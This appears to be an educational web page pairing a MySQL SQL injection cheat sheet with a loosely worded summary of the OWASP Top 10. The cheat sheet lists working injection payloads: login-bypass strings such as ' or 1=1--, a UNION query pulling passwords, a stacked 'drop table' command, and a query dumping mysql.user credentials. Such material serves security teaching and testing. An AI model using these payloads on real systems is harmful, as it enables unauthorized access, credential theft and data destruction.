MySQL - SQL Injection Cheat Sheet

 

Question: What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find
detailed technical information about the many different variants of the SQL Injection vulnerability.


Question: Give few example SQL Injection Cheat Sheet?
#1 - Add comment in between Query which leads to comments out rest of the query.
Normal Query

SELECT * FROM members WHERE email = 'adminuser' AND password = 'password'; 

tempered Query

SELECT * FROM members WHERE email = 'adminuser'-- AND password = 'password'; 

(In this query will check for username only)


#2 Add comment between some part of query

SELECT id,/* comment here*/ email FROM members WHERE 1 

#3 SQL Injection Attack deleting table

SELECT id email FROM members WHERE email="arun@example.com" ; drop table users

#4 Union Injections - try to get another table data

SELECT id email FROM members WHERE email="arun@example.com" union select email,password from members

#5 Bypassing Login Screens - Un-Authentication login with modify in sql through injection
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--


#6 Get All mysql users with password

SELECT User,Password FROM mysql.user;

#7 Get MySQL version

SELECT @@version

#8 Get all MySQL tables
SELECT * FROM information_schema.tables

#9 Sleep Query
SELECT 10,sleep(100)

OWASP Top 10 Security Risks and Vulnerabilities

Question: What Is OWASP?
Full form of OWASP is Open Web Application Security Project.
It is community which includes small and big IT companies and individual people etc, they provide us Top Vulnerabilities in IT.
Its is not an official standard, it is just a white paper that is used by many organizations, vulnerability bounty programs, and cyber security experts etc

 
Question: What are Top 10 Security Risks and Vulnerabilities?

1. Injection :
   With use of Structured Query Language(SQL), unauthorized person try to get the data which he have not access, modify/delete the data which he have not access.
   
   
2. Broken Authentication :
   With use of Some cookie/Sessions, unauthorized person try to login in the system
   
   
3. Sensitive Data Exposure :
   When we use website with Http URL (unsecured data transmission), data can be read by unauthorized person/organization
   
   
4. XML External Entities :
   Many times organization provide the XML data which is public, Attackers attack on the public data which leads to shut down the server.
   
   
5. Broken Access Control :
   Due to In proper coding/testing, Normal user switch to Admin user by manipulating some param.
   
   
6. Security Mis-configuration:
   Default Server configuration must be need check and update before go live.
   
   
7. Cross site scripting (XSS):
   With use of javascript, Attackers post on malicious code and it damage the server or effect the other users
   
   
8. Insecure Deserialization :
   When we transform the data from one format to another format, sometime data change to dramatically bad.
   
   
9. Using component with Known vulnerabilities :
   When we use the third party component without deep analysis, It can baddly effect of server or application.
   
   
10. Insufficient Logging and monitoring :
    We must add the proper logs to analyse in future